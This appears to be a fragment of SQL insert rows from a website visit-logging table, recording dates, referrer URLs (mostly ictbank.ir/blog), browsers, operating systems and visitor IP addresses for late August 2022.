(23526,'2022-08-19','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.42','000',0,5,0),
(23527,'2022-08-19','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','95.179.220.182','000',0,1,0),
(23528,'2022-08-19','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','82.196.5.234','000',0,1,0),
(23529,'2022-08-19','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.250.227.63','000',0,1,0),
(23530,'2022-08-19','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.244.3','000',0,1,0),
(23531,'2022-08-19','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.58','000',0,1,0),
(23532,'2022-08-19','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.210','000',0,2,0),
(23533,'2022-08-19','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','171.25.193.78','000',0,1,0),
(23534,'2022-08-19','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(23535,'2022-08-19','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.39','000',0,5,0),
(23536,'2022-08-19','http://ictbank.ir/blog','Chrome','Windows','55.0.2883.87','desktop','Unknown','','185.119.81.99','000',0,2,0),
(23537,'2022-08-20','http://ictbank.ir/blog','Chrome','Windows','10.0.648.151','desktop','Unknown','','208.80.194.126','000',0,3,0),
(23538,'2022-08-20','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','45.148.10.193','000',0,4,0),
(23539,'2022-08-20','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.139','desktop','Unknown','','185.119.81.99','000',0,2,0),
(23540,'2022-08-20','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.31','000',0,7,0),
(23541,'2022-08-20','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','212.16.164.132','000',0,1,0),
(23542,'2022-08-20','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','143.110.178.209','000',0,2,0),
(23543,'2022-08-20','http://ictbank.ir/blog','Chrome','OS X','103.0.0.0','desktop','Macintosh','','101.33.33.201','000',0,1,0),
(23544,'2022-08-20','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(23545,'2022-08-20','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,4,0),
(23546,'2022-08-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','181.214.206.161','000',0,2,0),
(23547,'2022-08-20','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.38','000',0,1,0),
(23548,'2022-08-20','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23549,'2022-08-20','http://ictbank.ir/blog','Firefox','Windows','7.0.1','desktop','Unknown','','208.80.194.121','000',0,2,0),
(23550,'2022-08-20','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','64.111.109.64','000',0,1,0),
(23551,'2022-08-20','http://ictbank.ir/blog','Firefox','OS X','3.6.11','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(23552,'2022-08-20','http://ictbank.ir/blog','Chrome','Windows','41.0.2226.0','desktop','Unknown','','49.12.9.126','000',0,1,0),
(23553,'2022-08-20','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.221.7.249','000',0,1,0),
(23554,'2022-08-20','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown','','Unknown','','143.92.32.36','000',0,2,0),
(23555,'2022-08-20','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','104.238.170.64','000',0,1,0),
(23556,'2022-08-20','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.131.196','000',0,1,0),
(23557,'2022-08-20','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','188.166.158.7','000',0,1,0),
(23558,'2022-08-20','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.135.165','000',0,1,0),
(23559,'2022-08-20','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23560,'2022-08-20','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','37.37.207.9','000',0,2,0),
(23561,'2022-08-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','157.230.109.66','000',0,2,0),
(23562,'2022-08-21','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(23563,'2022-08-21','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','18.206.85.83','000',0,1,0),
(23564,'2022-08-21','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(23565,'2022-08-21','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,5,0),
(23566,'2022-08-21','http://82.102.9.14:80/blog/sitemap.xml','Opera','Windows','73.0.3856.415','desktop','Unknown','','111.13.63.69','000',0,11,0),
(23567,'2022-08-21','http://ictbank.ir/blog','Chrome','Linux','5.0.375.53','desktop','Unknown','','208.80.194.122','000',0,5,0),
(23568,'2022-08-21','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown','','Unknown','','143.92.32.36','000',0,2,0),
(23569,'2022-08-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','137.184.75.144','000',0,2,0),
(23570,'2022-08-21','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','94.29.139.159','000',0,2,0),
(23571,'2022-08-21','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,3,0),
(23572,'2022-08-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(23573,'2022-08-21','http://www.design-arena.ir','Chrome','Windows','96.0.4664.45','desktop','Unknown','','45.88.97.214','000',0,4,0),
(23574,'2022-08-21','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.74','000',0,2,0),
(23575,'2022-08-21','http://ictbank.ir/blog','Chrome','Windows','81.0.4044.113','desktop','Unknown','','88.99.136.18','000',0,5,0),
(23576,'2022-08-21','http://ictbank.ir/blog','Chrome','Windows','98.0.4758.82','desktop','Unknown','','158.69.112.192','000',0,1,0),
(23577,'2022-08-21','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23578,'2022-08-21','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(23579,'2022-08-21','http://82.102.9.14:80/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','70.44.30.84','000',0,1,0),
(23580,'2022-08-21','http://wikisonnati.com','Chrome','Windows','50.0.2661.75','desktop','Unknown','','195.74.80.147','000',0,2,0),
(23581,'2022-08-21','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','95.179.211.0','000',0,2,0),
(23582,'2022-08-21','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','159.65.21.153','000',0,1,0),
(23583,'2022-08-21','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.250.227.63','000',0,1,0),
(23584,'2022-08-21','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(23585,'2022-08-22','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.88','000',0,2,0),
(23586,'2022-08-22','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Edge','Windows','90.0.818.49','desktop','Unknown','','178.159.37.11','000',0,8,0),
(23587,'2022-08-22','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','77.74.177.119','000',0,1,0),
(23588,'2022-08-22','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.122','000',0,7,0),
(23589,'2022-08-22','http://wikisonnati.com','Chrome','Windows','50.0.2661.75','desktop','Unknown','','213.251.184.216','000',0,2,0),
(23590,'2022-08-22','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23591,'2022-08-22','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.89','000',0,1,0),
(23592,'2022-08-22','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.210','000',0,2,0),
(23593,'2022-08-22','http://ictbank.ir/blog','Chrome','Windows','60.0.3056.79','desktop','Unknown','','54.224.111.162','000',0,2,0),
(23594,'2022-08-22','http://ictbank.ir/blog','Chrome','Windows','104.0.0.0','desktop','Unknown','','85.133.232.202','000',0,1,0),
(23595,'2022-08-22','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.121','000',0,1,0),
(23596,'2022-08-22','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,3,0),
(23597,'2022-08-22','http://ictbank.ir/blog','Chrome','Windows','100.0.4895.86','desktop','Unknown','','5.188.62.76','000',0,2,0),
(23598,'2022-08-22','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,8,0),
(23599,'2022-08-22','http://82.102.9.14:80','Chrome','Windows','17.0.963.56','desktop','Unknown','','198.50.168.185','000',0,4,0),
(23600,'2022-08-22','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.87.133.163','000',0,1,0),
(23601,'2022-08-22','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','20.117.117.32','000',0,2,0),
(23602,'2022-08-22','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','37.37.207.9','000',0,2,0),
(23603,'2022-08-22','http://ictbank.ir/blog','Chrome','Android','104.0.0.0','mobile:smart','Poco M3','','5.208.72.66','000',0,1,0),
(23604,'2022-08-22','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.199.102','000',0,1,0),
(23605,'2022-08-22','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.250.227.63','000',0,1,0),
(23606,'2022-08-22','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.131.196','000',0,1,0),
(23607,'2022-08-22','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','46.101.79.124','000',0,1,0),
(23608,'2022-08-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(23609,'2022-08-22','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(23610,'2022-08-22','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','85.159.215.228','000',0,2,0),
(23611,'2022-08-22','http://82.102.9.14/blog','Unknown','Unknown','Unknown','bot','Unknown','','164.92.217.201','000',0,1,0),
(23612,'2022-08-23','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,18,0),
(23613,'2022-08-23','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.157','desktop','Unknown','','51.254.199.11','000',0,1,0),
(23614,'2022-08-23','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','185.181.60.189','000',0,1,0),
(23615,'2022-08-23','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,7,0),
(23616,'2022-08-23','http://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','76.72.172.162','000',0,1,0),
(23617,'2022-08-23','http://ictbank.ir/blog','Opera','Windows','11.00','desktop','Unknown','','3.68.50.38','000',0,1,0),
(23618,'2022-08-23','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown','','Unknown','','143.92.32.39','000',0,4,0),
(23619,'2022-08-23','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.121','desktop','Unknown','','171.211.123.24','000',0,4,0),
(23620,'2022-08-23','http://ictbank.ir/blog','Chrome','Windows','100.0.4896.75','desktop','Unknown','','47.104.21.0','000',0,2,0),
(23621,'2022-08-23','http://82.102.9.14/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','27.124.32.155','000',0,3,0),
(23622,'2022-08-23','http://ictbank.ir/blog','Chrome','Linux','5.0.375.53','desktop','Unknown','','208.80.194.122','000',0,4,0),
(23623,'2022-08-23','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.92.113.164','000',0,1,0),
(23624,'2022-08-23','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23625,'2022-08-23','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,4,0),
(23626,'2022-08-23','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','185.3.94.140','000',0,2,0),
(23627,'2022-08-23','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','217.69.6.75','000',0,1,0),
(23628,'2022-08-23','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','45.32.144.195','000',0,1,0),
(23629,'2022-08-23','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','159.65.21.153','000',0,1,0),
(23630,'2022-08-23','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.135.165','000',0,1,0),
(23631,'2022-08-23','http://82.102.9.14/blog','Firefox','Linux','73.0','desktop','Unknown','','167.71.84.55','000',0,2,0),
(23632,'2022-08-23','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.170','000',0,1,0),
(23633,'2022-08-23','http://ictbank.ir/blog','Chrome','Windows','68.0.3440.25','desktop','Unknown','','212.102.33.67','000',0,2,0),
(23634,'2022-08-24','http://82.102.9.14:80/blog/sitemap.xml','Whale Browser','OS X','2.9.118.16','desktop','Macintosh','','106.75.84.21','000',0,11,0),
(23635,'2022-08-24','http://82.102.9.14:80/blog/sitemap.xml','Safari','Windows','6.0','desktop','Unknown','','106.75.2.164','000',0,11,0),
(23636,'2022-08-24','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,1,0),
(23637,'2022-08-24','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown','','Unknown','','143.92.32.39','000',0,2,0),
(23638,'2022-08-24','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,14,0),
(23639,'2022-08-24','http://ictbank.ir/blog','Opera','Windows','32.0.1948.45','desktop','Unknown','','193.233.193.16','000',0,14,0),
(23640,'2022-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0.648.151','desktop','Unknown','','208.80.194.121','000',0,1,0),
(23641,'2022-08-24','http://baidu.com/','MIUI Browser','Android','10.1.1','mobile:smart','Mi Note 2','','42.236.10.93','000',0,1,0),
(23642,'2022-08-24','http://ictbank.ir/blog','Safari','iOS','11.0','mobile:smart','iPhone','','171.13.14.18','000',0,1,0),
(23643,'2022-08-24','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,1,0),
(23644,'2022-08-24','http://ictbank.ir/','Opera','Linux','89.0.4447.51','desktop','Unknown','','141.95.33.140','000',0,1,0),
(23645,'2022-08-24','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(23646,'2022-08-24','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.81','000',0,2,0),
(23647,'2022-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0.648.151','desktop','Unknown','','208.80.194.122','000',0,4,0),
(23648,'2022-08-24','http://ictbank.ir/blog','Chrome','Windows','34.0.1847.116','desktop','Unknown','','46.101.80.192','000',0,7,0),
(23649,'2022-08-24','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','23.236.147.154','000',0,1,0),
(23650,'2022-08-24','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.132.75','000',0,2,0),
(23651,'2022-08-24','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','192.81.222.35','000',0,1,0),
(23652,'2022-08-24','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','185.14.184.197','000',0,1,0),
(23653,'2022-08-24','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.244.3','000',0,1,0),
(23654,'2022-08-24','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.199.102','000',0,1,0),
(23655,'2022-08-24','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.22','000',0,1,0),
(23656,'2022-08-24','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(23657,'2022-08-24','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','45.148.10.193','000',0,2,0),
(23658,'2022-08-24','http://ictbank.ir/blog','Chrome','Windows','88.0.4240.193','desktop','Unknown','','20.206.146.96','000',0,1,0),
(23659,'2022-08-24','http://82.102.9.14/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','80.87.206.219','000',0,2,0),
(23660,'2022-08-25','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,12,0),
(23661,'2022-08-25','http://ictbank.ir/blog','Chrome','Windows','16.0.912.63','desktop','Unknown','','208.80.194.122','000',0,1,0),
(23662,'2022-08-25','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,6,0),
(23663,'2022-08-25','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,9,0),
(23664,'2022-08-25','http://www.wikisonnati.com','Chrome','Windows','96.0.4664.45','desktop','Unknown','','216.24.213.49','000',0,4,0),
(23665,'2022-08-25','http://ictbank.ir/blog','Chrome','Windows','96.0.4664.45','desktop','Unknown','','69.171.251.14','000',0,1,0),
(23666,'2022-08-25','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(23667,'2022-08-25','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.35.128','000',0,1,0),
(23668,'2022-08-25','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(23669,'2022-08-25','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(23670,'2022-08-25','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(23671,'2022-08-25','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','188.166.89.26','000',0,2,0),
(23672,'2022-08-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(23673,'2022-08-25','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23674,'2022-08-25','http://ictbank.ir/blog','Unknown','Linux','Unknown','desktop','Unknown','','67.213.90.30','000',0,1,0),
(23675,'2022-08-25','http://82.102.9.14:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.64.67','000',0,1,0),
(23676,'2022-08-25','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,2,0),
(23677,'2022-08-25','http://www.ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','137.74.24.99','000',0,2,0),
(23678,'2022-08-25','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.212.43.165','000',0,1,0),
(23679,'2022-08-25','http://ictbank.ir/blog','Chrome','OS X','79.0.3945.88','desktop','Macintosh','','159.89.45.15','000',0,1,0),
(23680,'2022-08-25','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.135.165','000',0,1,0),
(23681,'2022-08-25','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','209.97.131.196','000',0,2,0),
(23682,'2022-08-25','http://ictbank.ir/blog/','Chrome','Windows','96.0.4664.110','desktop','Unknown','','78.141.199.102','000',0,1,0),
(23683,'2022-08-25','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.40','000',0,4,0),
(23684,'2022-08-25','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.45','000',0,3,0),
(23685,'2022-08-26','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','185.7.214.117','000',0,5,0),
(23686,'2022-08-26','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','71.6.158.166','000',0,2,0),
(23687,'2022-08-26','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(23688,'2022-08-26','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(23689,'2022-08-26','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.41.193','000',0,1,0),
(23690,'2022-08-26','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','128.14.136.78','000',0,2,0),
(23691,'2022-08-26','http://ictbank.ir/blog','Firefox','Windows','3.6.8','desktop','Unknown','','208.80.194.122','000',0,4,0),
(23692,'2022-08-26','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(23693,'2022-08-26','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.74','000',0,2,0),
(23694,'2022-08-26','http://ictbank.ir/blog','Firefox','Windows','102.0','desktop','Unknown','','176.9.47.122','000',0,2,0),
(23695,'2022-08-26','http://mail.design-arena.ir/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','209.141.57.178','000',0,1,0),
(23696,'2022-08-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(23697,'2022-08-26','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.186.114.184','000',0,1,0),
(23698,'2022-08-26','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(23699,'2022-08-26','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.6','000',0,2,0),
(23700,'2022-08-26','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(23701,'2022-08-26','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.160.80','000',0,2,0),
(23702,'2022-08-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(23703,'2022-08-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(23704,'2022-08-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(23705,'2022-08-26','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(23706,'2022-08-26','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.246.188.74','000',0,1,0),
(23707,'2022-08-26','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.47','000',0,6,0),
(23708,'2022-08-26','https://www.bing.com/','Edge','Windows','104.0.1293.63','desktop','Unknown','','190.150.170.127','000',0,1,0),
(23709,'2022-08-26','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.36','000',0,5,0),
(23710,'2022-08-27','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.126','000',0,4,0),
(23711,'2022-08-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.27','000',0,4,0),
(23712,'2022-08-27','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23713,'2022-08-27','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(23714,'2022-08-27','http://ictbank.ir/blog','Chrome','OS X','26.0.1410.65','desktop','Macintosh','','35.86.35.91','000',0,1,0),
(23715,'2022-08-27','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23716,'2022-08-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.40','000',0,6,0),
(23717,'2022-08-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.44','000',0,33,0),
(23718,'2022-08-27','http://ictbank.ir/blog','Chrome','OS X','26.0.1410.65','desktop','Macintosh','','35.84.181.89','000',0,2,0),
(23719,'2022-08-27','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(23720,'2022-08-27','http://baidu.com/','MIUI Browser','Android','10.1.1','mobile:smart','Mi Note 2','','42.236.10.75','000',0,1,0),
(23721,'2022-08-27','http://baidu.com/','MIUI Browser','Android','10.1.1','mobile:smart','Mi Note 2','','42.236.10.93','000',0,1,0),
(23722,'2022-08-27','http://baidu.com/','MIUI Browser','Android','10.1.1','mobile:smart','Mi Note 2','','42.236.10.117','000',0,1,0),
(23723,'2022-08-27','http://ictbank.ir/blog','Chrome','Windows','79.0','desktop','Unknown','','20.163.113.224','000',0,1,0),
(23724,'2022-08-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.43','000',0,14,0),
(23725,'2022-08-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.38','000',0,2,0),
(23726,'2022-08-27','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(23727,'2022-08-27','https://www.google.com/','Chrome','Windows','104.0.0.0','desktop','Unknown','','152.231.239.195','000',0,1,0),
(23728,'2022-08-27','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(23729,'2022-08-27','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(23730,'2022-08-27','http://wikisonnati.com/blog','Firefox Mobile','Android','68.0','mobile:smart','Unknown','','49.12.1.27','000',0,2,0),
(23731,'2022-08-27','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.91.171.239','000',0,1,0),
(23732,'2022-08-27','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,2,0),
(23733,'2022-08-27','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(23734,'2022-08-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,4,0),
(23735,'2022-08-27','http://ictbank.ir/blog','Chrome','OS X','91.0.4472.114','desktop','Macintosh','','93.158.91.249','000',0,1,0),
(23736,'2022-08-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,2,0),
(23737,'2022-08-27','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,2,0),
(23738,'2022-08-27','http://wikisonnati.com','Chrome','Windows','102.0.0.0','desktop','Unknown','','67.201.33.38','000',0,4,0),
(23739,'2022-08-27','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.46','000',0,2,0),
(23740,'2022-08-27','http://ictbank.ir/blog','Chrome','Windows','76.0.3809.100','desktop','Unknown','','13.58.111.23','000',0,3,0),
